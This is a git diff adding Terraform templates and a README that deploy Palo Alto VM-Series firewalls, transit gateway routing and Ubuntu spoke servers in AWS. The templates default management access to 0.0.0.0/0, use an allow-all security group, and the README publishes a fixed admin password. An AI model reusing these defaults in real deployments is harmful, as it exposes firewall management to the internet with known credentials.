+  default     = "ptg-tgw-bucket1"
+}
+
+variable bootstrap_s3bucket2 {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "ptg-tgw-bucket2"
+}
+
+//End of the section that MUST be modified to work
+variable management_cidr {
+  description = "CIDR Address for Management Access"
+  default     = "0.0.0.0/0"
+}
+
+variable vpc_security_cidr {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.0.0/16"
+}
+
+variable vpc_security_subnet_public_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.1.0/24"
+}
+
+variable vpc_security_subnet_private_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.101.0/24"
+}
+
+variable fw_ip_subnet_private_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.101.45"
+}
+
+variable fw_ip_subnet_public_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.1.45"
+}
+
+variable vpc_security_subnet_tgw_1 {
+  description = "CIDR Address for TGW Security VPC"
+  default     = "192.168.11.0/24"
+}
+
+variable vpc_security_subnet_public_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.2.0/24"
+}
+
+variable vpc_security_subnet_private_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.102.0/24"
+}
+
+variable vpc_security_subnet_tgw_2 {
+  description = "CIDR Address for TGW Security VPC"
+  default     = "192.168.21.0/24"
+}
+
+variable fw_ip_subnet_private_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.102.45"
+}
+
+variable fw_ip_subnet_public_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.2.45"
+}
+
+variable spoke1_cidr {
+  description = "CIDR Address for Spoke1 VPC"
+  default     = "10.1.0.0/16"
+}
+
+variable spoke1_subnet {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.1.0/24"
+}
+
+variable spoke1_subnet2 {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.2.0/24"
+}
+
+variable spoke1_server {
+  description = "Server Address for Spoke1 Server"
+  default     = "10.1.1.45"
+}
+
+variable spoke1_server2 {
+  description = "Server Address for Spoke1 Server2"
+  default     = "10.1.2.45"
+}
+
+variable spoke2_cidr {
+  description = "CIDR Address for Spoke2 VPC"
+  default     = "10.2.0.0/16"
+}
+
+variable spoke2_subnet {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.1.0/24"
+}
+
+variable spoke2_subnet2 {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.2.0/24"
+}
+
+variable spoke2_server {
+  description = "Server Address for Spoke2 Server"
+  default     = "10.2.1.45"
+}
+
+variable spoke2_server2 {
+  description = "Server Address for Spoke2 Server2"
+  default     = "10.2.2.45"
+}
diff --git a/aws/TGW-VPC-GovCloud/vm-series/main.tf b/aws/TGW-VPC-GovCloud/vm-series/main.tf
new file mode 100644
index 00000000..e519e14c
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/vm-series/main.tf
@@ -0,0 +1,165 @@
+variable name {
+  description = "firewall instance name"
+}
+
+variable untrust_subnet_id {}
+variable untrust_security_group_id {}
+variable untrustfwip {}
+
+variable trust_subnet_id {}
+variable trust_security_group_id {}
+variable trustfwip {}
+
+variable management_subnet_id {}
+variable management_security_group_id {}
+
+variable bootstrap_profile {
+  default = ""
+}
+
+variable bootstrap_s3bucket {}
+
+variable tgw_id {}
+
+variable aws_region {}
+variable aws_key {}
+
+variable instance_type {
+  default = "m4.2xlarge"
+}
+
+variable ngfw_license_type {
+  default = "payg2"
+}
+
+variable ngfw_version {
+  default = "8.1"
+}
+
+variable "license_type_map" {
+  type = "map"
+
+  default = {
+    "byol"  = "6njl1pau431dv1qxipg63mvah"
+    "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km"
+    "payg2" = "806j2of0qy5osgjjixq9gqc6g"
+  }
+}
+
+data "aws_ami" "panw_ngfw" {
+  most_recent = true
+  owners = ["aws-marketplace"]
+  filter {
+    name   = "owner-alias"
+    values = ["aws-marketplace"]
+  }
+
+  filter {
+    name   = "product-code"
+    values = ["${var.license_type_map[var.ngfw_license_type]}"]
+  }
+
+  filter {
+    name   = "name"
+    values = ["PA-VM-AWS-${var.ngfw_version}*"]
+  }
+}
+
+data "aws_region" "current" {
+  name = "${var.aws_region}"
+}
+
+resource "aws_network_interface" "eni-management" {
+  subnet_id         = "${var.management_subnet_id}"
+  security_groups   = ["${var.management_security_group_id}"]
+  source_dest_check = true
+
+  tags {
+    Name = "eni_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-trust" {
+  subnet_id         = "${var.trust_subnet_id}"
+  private_ips       = ["${var.trustfwip}"]
+  security_groups   = ["${var.trust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_trust"
+  }
+}
+
+output "eni-trust" {
+  value = "${aws_network_interface.eni-trust.id}"
+}
+
+resource "aws_eip" "eip-management" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-management.id}"
+
+  tags {
+    Name = "eip_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-untrust" {
+  subnet_id         = "${var.untrust_subnet_id}"
+  private_ips       = ["${var.untrustfwip}"]
+  security_groups   = ["${var.untrust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_untrust"
+  }
+}
+
+resource "aws_eip" "eip-untrust" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-untrust.id}"
+
+  tags {
+    Name = "eip_${var.name}_untrust"
+  }
+}
+
+resource "aws_instance" "instance-ngfw" {
+  disable_api_termination              = false
+  instance_initiated_shutdown_behavior = "stop"
+  iam_instance_profile                 = "${var.bootstrap_profile}"
+  user_data                            = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}"
+
+  ebs_optimized = true
+  ami           = "${data.aws_ami.panw_ngfw.image_id}"
+  instance_type = "${var.instance_type}"
+  key_name      = "${var.aws_key}"
+
+  monitoring = false
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.eni-management.id}"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.eni-untrust.id}"
+  }
+
+  network_interface {
+    device_index         = 2
+    network_interface_id = "${aws_network_interface.eni-trust.id}"
+  }
+
+  tags {
+    Name = "${var.name}"
+  }
+}
+
+output "eip_untrust" {
+  value = "${aws_eip.eip-untrust.public_ip}"
+}
+
+output "eip_mgmt" {
+  value = "${aws_eip.eip-management.public_ip}"
+}
diff --git a/aws/TGW-VPC-GovCloud/vpc_security.tf b/aws/TGW-VPC-GovCloud/vpc_security.tf
new file mode 100644
index 00000000..2d0fe6e8
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/vpc_security.tf
@@ -0,0 +1,325 @@
+data "aws_availability_zones" "available" {}
+
+resource "aws_vpc" "vpc_security" {
+  cidr_block = "${var.vpc_security_cidr}"
+
+  tags {
+    Name = "vpc_security"
+  }
+}
+
+resource "aws_subnet" "vpc_security_public_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_security_public_1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_public_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_security_public_2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_private_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_security_private_1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_private_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_security_private_2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_security_tgw_1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_security_tgw_2"
+  }
+}
+
+resource "aws_route_table" "vpc_security_tgw_1" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "tgw_1"
+  }
+}
+
+resource "aws_route_table" "vpc_security_tgw_2" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "tgw_2"
+  }
+}
+
+resource "aws_route_table" "vpc_security_private_1" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "private_1"
+  }
+}
+
+resource "aws_route_table" "vpc_security_private_2" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "private_2"
+  }
+}
+
+resource "aws_route_table_association" "vpc_security_private_1" {
+  subnet_id      = "${aws_subnet.vpc_security_private_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_private_1.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_private_2" {
+  subnet_id      = "${aws_subnet.vpc_security_private_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_private_2.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_1" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw_1.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_2" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw_2.id}"
+}
+
+resource "aws_route" "vpc_security_tgw_1_0" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_1.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  network_interface_id   = "${module.ngfw1.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_1_1" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_1.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  network_interface_id   = "${module.ngfw1.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_2_0" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_2.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  network_interface_id   = "${module.ngfw2.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_2_1" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_2.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  network_interface_id   = "${module.ngfw2.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_trust_1_0" {
+  route_table_id         = "${aws_route_table.vpc_security_private_1.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  transit_gateway_id     = "${aws_ec2_transit_gateway.tgw.id}"
+}
+
+resource "aws_route" "vpc_security_trust_2_0" {
+  route_table_id         = "${aws_route_table.vpc_security_private_2.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  transit_gateway_id     = "${aws_ec2_transit_gateway.tgw.id}"
+}
+
+resource "aws_internet_gateway" "vpc_security_igw" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "vpc_securty_igw"
+  }
+}
+
+resource "aws_route" "vpc_security_default" {
+  route_table_id         = "${aws_vpc.vpc_security.default_route_table_id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_internet_gateway.vpc_security_igw.id}"
+}
+
+resource "aws_security_group" "allow_all" {
+  name        = "allow_all"
+  description = "Allow all inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "allow_all_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_all.id}"
+}
+
+resource "aws_security_group_rule" "allow_all_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_all.id}"
+}
+
+resource "aws_security_group" "allow_https_ssh" {
+  name        = "allow_https_ssh"
+  description = "Allow HTTPS and SSH inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "allow_ssh_ingress" {
+  type        = "ingress"
+  from_port   = 22
+  to_port     = 22
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+resource "aws_security_group_rule" "allow_https_ingress" {
+  type        = "ingress"
+  from_port   = 443
+  to_port     = 443
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+resource "aws_security_group_rule" "allow_all" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+module "ngfw1" {
+  source = "./vm-series/"
+
+  name = "ngfw1"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_private_1.id}"
+  trust_security_group_id = "${aws_security_group.allow_all.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_1}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_public_1.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_1 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_public_1.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region = "${var.aws_region}"
+}
+
+module "ngfw2" {
+  source = "./vm-series/"
+
+  name = "ngfw2"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_private_2.id}"
+  trust_security_group_id = "${aws_security_group.allow_all.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_2}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_public_2.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_2 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_public_2.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile2.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket2}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region = "${var.aws_region}"
+}
+
+output "FW-1-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw1.eip_mgmt}"
+}
+
+output "Server-1-1_ngfw1_access" {
+  value = "Access Server 1-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw1_access" {
+  value = "Access Server 1-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw1_access" {
+  value = "Access Server 2-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw1_access" {
+  value = "Access Server 2-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2002"
+}
+
+output "FW-2-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw2.eip_mgmt}"
+}
+
+output "Server-1-1_ngfw2_access" {
+  value = "Access Server 1-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw2_access" {
+  value = "Access Server 1-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw2_access" {
+  value = "Access Server 2-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw2_access" {
+  value = "Access Server 2-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2002"
+}
diff --git a/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf b/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf
new file mode 100644
index 00000000..0e6da0e8
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf
@@ -0,0 +1,191 @@
+variable vpc_spoke_cidr {
+  description = "CIDR Network Address for Spoke VPC"
+}
+
+variable vpc_spoke_subnet_cidr {
+  description = "CIDR Network Address for Spoke Subnet"
+}
+
+variable vpc_spoke_subnet2_cidr {
+  description = "CIDR Network Address for Spoke Subnet"
+}
+
+variable aws_tgw_id {
+  description = "AWS Transit Gateway ID"
+}
+
+variable aws_tgw_security_rtb_id {
+  description = "AWS Transit Gateway Route Table Id"
+}
+
+variable aws_tgw_spoke_rtb_id {
+  description = "AWS Transit Gateway Route Table Id"
+}
+
+variable pemkey {
+  description = "AWS pem KEY"
+}
+
+variable serverip {
+  description = "Ubuntu Server IP"
+}
+
+variable server2ip {
+  description = "Ubuntu Server2 IP"
+}
+
+variable servername {
+  description = "Ubuntu Server name"
+}
+
+variable server2name {
+  description = "Ubuntu Server2 name"
+}
+
+resource "aws_vpc" "vpc_spoke" {
+  cidr_block = "${var.vpc_spoke_cidr}"
+
+  tags {
+    Name = "vpc_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+data "aws_availability_zones" "available" {}
+
+resource "aws_subnet" "primary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}"
+  }
+}
+
+resource "aws_subnet" "secondary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet2_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}"
+  }
+}
+
+resource "aws_security_group" "server_sg" {
+  name        = "server_sg"
+  description = "Allow select inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_spoke.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["10.0.0.0/8", "192.168.0.0/16"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+resource "aws_route" "vpc_spoke_route_1" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "10.0.0.0/8"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+resource "aws_route" "vpc_spoke_route_2" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "192.168.0.0/16"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+resource "aws_route" "vpc_spoke_route_3" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "0.0.0.0/0"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" {
+  vpc_id                                          = "${aws_vpc.vpc_spoke.id}"
+  subnet_ids                                      = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"]
+  transit_gateway_id                              = "${var.aws_tgw_id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}"
+}
+
+//Server in subnet
+data "aws_ami" "ubuntu" {
+  most_recent = true
+
+  filter {
+    name   = "name"
+    values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-*"]
+  }
+
+  filter {
+    name   = "virtualization-type"
+    values = ["hvm"]
+  }
+
+  owners = ["513442679011"] # Canonical
+}
+
+resource "aws_instance" "web" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t2.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.primary.id}"
+  private_ip      = "${var.serverip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.servername}"
+  }
+}
+
+resource "aws_instance" "web2" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t2.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.secondary.id}"
+  private_ip      = "${var.server2ip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.server2name}"
+  }
+}
+
+//End Server
+output "vpc_id" {
+  value = "${aws_vpc.vpc_spoke.id}"
+}
+
+output "subnet_id" {
+  value = "${aws_subnet.primary.id}"
+}
diff --git a/aws/TGW-VPC-GovCloud/vpc_spokes.tf b/aws/TGW-VPC-GovCloud/vpc_spokes.tf
new file mode 100644
index 00000000..d0e66637
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/vpc_spokes.tf
@@ -0,0 +1,31 @@
+module "spoke1" {
+  source = "./vpc_spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke1_server}"
+  server2ip               = "${var.spoke1_server2}"
+  servername              = "spoke1-server1"
+  server2name             = "spoke1-server2"
+  vpc_spoke_cidr          = "${var.spoke1_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke1_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke1_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+module "spoke2" {
+  source = "./vpc_spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke2_server}"
+  server2ip               = "${var.spoke2_server2}"
+  servername              = "spoke2-server"
+  server2name             = "spoke2-server2"
+  vpc_spoke_cidr          = "${var.spoke2_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke2_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke2_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
diff --git a/aws/TGW-VPC-Mirroring/README.md b/aws/TGW-VPC-Mirroring/README.md
new file mode 100644
index 00000000..de470543
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/README.md
@@ -0,0 +1,72 @@
+## 4 x VM-Series / 2 x Spoke VPCs via Transit Gateway
+Terraform creates 2 VM-Series firewalls sets.  1 for inbound and outbound traffic from the spoke VPCs.  The other set is setup behind an internal Load Balancer and ready for VPC Traffic Mirroring configuration.  Currently, the AWS Terraform Provider does not support VPC Traffic Mirror.  As a result, after deployment there are some steps that need to be done to setup VPC traffic Mirroring.  Those are documenented in screen shots below.
+
+### Overview
+* 3 x VPCs with relevant TGW connections and routing
+* 4 x VM-Series (Bundle1)
+* 2 x Ubuntu VM in spoke1 VPC 
+* 2 x Ubuntu VM in spoke2 VPC
+* 1 x NLB Internal Load Balancer (NGFW 3 & 4 as backend)
+* 4 x S3 Buckets for VM-Series 
+
+This is picture of the deployed environment:  Note: the Panorama server does not get deployed as part of this but can be easily setup to accept connections from the VM_Series firewall by modifying the init.cfg files in the bootstrap folders.
+
+![2019-09-25_15-44-51](https://user-images.githubusercontent.com/21991161/65640440-02757100-dfb0-11e9-9578-a2a920a270b5.jpg)
+
+
+### Prerequistes 
+1. Terraform
+2. Access to AWS Console
+
+After deployment, the firewalls' username and password are:
+     * **Username:** admin
+     * **Password:** Pal0Alt0@123
+
+### Deployment
+1.  Download the **TGW-VPC-Mirroring** repo to the machine running the build
+2.  In an editor, open **variables.tf** and set values for the following variables
+
+| Variable        | Description |
+| :------------- | :------------- |
+| `aws_region` | AWS Region of Deployment|
+| `aws_key` | Authentication key file for deployed VMs |
+| `bootstrap_s3bucket` | Universally unigue name for Boostrap S3 Bucket for NGFW1 |
+| `bootstrap_s3bucket2`| Universally unigue name for Boostrap S3 Bucket for NGFW2 |
+| `bootstrap_s3bucket3`| Universally unigue name for Boostrap S3 Bucket for NGFW3 |
+| `bootstrap_s3bucket4`| Universally unigue name for Boostrap S3 Bucket for NGFW4 |
+| 
+
+3. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment an output with connection information will be displayed:
+![output](https://user-images.githubusercontent.com/21991161/65640400-e671cf80-dfaf-11e9-992f-d026cc7f0f45.jpg)
+
+6. To configure VPC Mirroring first select VPC/Traffic Mirroring/Mirror Filter and Create a new traffic mirror filter
+
+![Mirrorfilterselection](https://user-images.githubusercontent.com/21991161/65637508-eb338500-dfa9-11e9-893b-1255ed2f7135.jpg)" width="350">
+
+
+7. Fill in the fields and click create
+![MirrorFilterOptions](https://user-images.githubusercontent.com/21991161/65637506-eb338500-dfa9-11e9-9453-c9a32bf9f276.jpg)
+
+8. Next select VPC/Traffic Mirror/Mirror Targets and click Create a Mirror Target
+![Mirrortargetselection](https://user-images.githubusercontent.com/21991161/65637512-ebcc1b80-dfa9-11e9-9d27-a50ac1698ad3.jpg)
+
+
+9. Fill in the fields and click create
+![MirrorTargetoptions](https://user-images.githubusercontent.com/21991161/65637511-eb338500-dfa9-11e9-82b4-65cedbdeea71.jpg)
+
+10. Select VPC/Traffic Mirror/Mirror Sessions and click Create a Mirror Session
+![MirrorSessionSelection](https://user-images.githubusercontent.com/21991161/65637510-eb338500-dfa9-11e9-9966-b4f5d1b279ca.jpg)
+
+11. Fill in the fields and click create
+![mirrorsessionoptions](https://user-images.githubusercontent.com/21991161/65637509-eb338500-dfa9-11e9-87c9-fdfdb3a6a738.jpg)
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/aws/TGW-VPC-Mirroring/bootstrap.tf b/aws/TGW-VPC-Mirroring/bootstrap.tf
new file mode 100644
index 00000000..76438ede
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket" {
+  bucket        = "${var.bootstrap_s3bucket}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket"
+  }
+}
+
+#Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files/authcodes"
+}
+
